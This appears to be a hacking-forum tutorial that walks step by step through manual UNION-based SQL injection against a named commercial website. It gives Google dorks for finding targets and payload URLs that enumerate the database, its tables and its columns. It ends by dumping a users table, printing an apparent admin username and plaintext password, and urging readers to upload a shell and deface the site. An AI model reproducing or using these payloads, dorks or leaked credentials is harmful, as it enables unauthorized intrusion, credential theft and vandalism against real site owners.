SQL Injection

hello all 


today I'm going to show you how SQL injection process goes 
STEP BY STEP 


############################################################
FIRST : How to find VULN. sites for SQL-i :-
-we can find google VULN. sites using google dorks like :

Code:

inurl:index.php?id=
inurl:article.php?id=
allinurl:news.php?id=
inurl:shop.php?cat=

############################################################







SECOND : How to know if the site is VULN. or not :-
-we can know if the site is VULN. for SQL-i by adding ' in the end of the link for example

Code:

http://www.walnutacres.com/news_view.php?id=40

to

Code:

http://www.walnutacres.com/news_view.php?id=40'

if we got an error message like:

Code:

Warning: mysql_fetch_assoc(),Warning: mysql_fetch_array(),mysql_num_rows(),mysql error,mysql_query,mysql_fetch,mysql_connect

or the page disappear then its VULN. to SQL-i
if nothing happened then find another one 
but in the example i gave above the page disappeared so its VULN.!!






############################################################






THIRD : Finding how many VULN. columns we have so we type :

Code:

+ORDER+BY+number

so lets do it on our target site 

Quote:http://www.walnutacres.com/news_view.php...ORDER+BY+1 <= no blank page
http://www.walnutacres.com/news_view.php...ORDER+BY+2 <= no blank page
http://www.walnutacres.com/news_view.php...ORDER+BY+3 <= no blank page
http://www.walnutacres.com/news_view.php...ORDER+BY+4 <= BLANK PAGE!

So now we have 3 VULN. columns. 
so what next?    
Now we select them all with this command UNION SELECT 
so it will be like :

Code:

http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+1,2,3--

DO NOT forget to put '--' in the end of the URL and '-' after id= 
So back to our target after selecting them all and adding '-' after id= and '--' in the end we got this on the page :

Quote:1
Dec 31, 1969


2

so we have 1 & 2 vuln. 






############################################################






FIFTH : Getting MySQL info


1- getting MySQL user :
we replace number "1" in the URL with user() :

Code:

http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+user(),2,3--

we got :

Quote:walnut_db@bolwebserv2.hvntdom.hain-celestial.com

2-getting MySQL Database name we replace user() with database() :

Code:

http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+database(),2,3--

we got :

Quote:walnut_live

3-getting MySQL version so we replace database() with @@version or version()

Code:

http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+version(),2,3--
or
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+@@version,2,3--

we got :

Quote:5.0.77-log

ok now lets get MySQL tables 






##########################################################






OK, now we will replace version() or @@version with group_concat(table_name)
and
add this in the end of the URL before the '--' :

Code:

+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

so it will be like :

Code:

http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+GROUP_CONCAT(TABLE_NAME),2,3+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

OK now we got all the tables names on that Database and they are :

Quote:faq,faq_rot,hp,mail,pr,pr_attach,product,product_nutrition,state_name,stores,use​rs,zipcodes

as you can see we have a table called "users" and that table might contain the usernames & passwords
OK guyz now we have the tables names, lets get the columns names 
now we edit our URL like this :
we replace :
group_concat(table_name) 
to 
group_concat(column_name)
AND we edit this :

Code:

FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

and we turn it into :

Code:

FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--

so our URL will be like this :

Code:

http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+group_concat(column_name),2,3+FROM+INFORMATION_SCHEMA.COLUMNS+WH​ERE+TABLE_SCHEMA=DATABASE()--

now we got ALOT of columns and we only want the columns in "users" table so what can we do? 

###########################################################








Now to get the columns in "users" table we can use MySQL CHAR code to get that code use AddOn for mozilla called "HackBar" ,
SO now "users" in CHAR code =

Code:

CHAR(117, 115, 101, 114, 115)

So now we replace database() in the end of the URL with the char code and we chage this :

Code:

FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA
to
FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME

so as a final result 

our URL will be like this :

Code:

http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+group_concat(column_name),2,3+FROM+INFORMATION_SCHEMA.COLUMNS+WH​ERE+TABLE_NAME=CHAR(117, 115, 101, 114, 115)--

and now we have the columns in "users" table and they are :

Code:

id,user,pass,active,acl_cms,acl_cor,acl_str,acl_umgr,acl_cms_pr,acl_cms_faq,acl_​cms_prod,acl_cms_store,acl_cms_hp,id,user,pass,active,acl_cms,acl_cor,acl_str,ac​l_umgr,acl_cms_pr,acl_cms_faq,acl_cms_prod,acl_cms_store,acl_cms_hp

ALOT of them right? 
but all we need is the first three : id,user,pass






#################################################################






now we will edit the URL again and change :

Code:

group_concat(column_name)
to
group_concat(id,0x3a,user,0x3a,pass)

and we replace this :

Code:

+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(117,%20115,%20101,%20114,​%20115)--

with this :

Code:

+FROM+users

and our URL will be like :

Code:

http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+group_concat(id,0x3a,user,0x3a,pass),2,3++FROM+users

and we this will appear on the page :

Quote:11:webmaster:Tree!House

Congrats xD we have the the admin's user name and password which is :
USERNAME : webmaster
PASSWORD :Tree!House
ok now you should find the admin page login as the admin and upload the shell  and deface! 
and you can find the admin page through online admin finders or any program or script 
for example :
http://sc0rpion.ir/af/
Happy ha©king 


TUT BY Dr.Z0mbie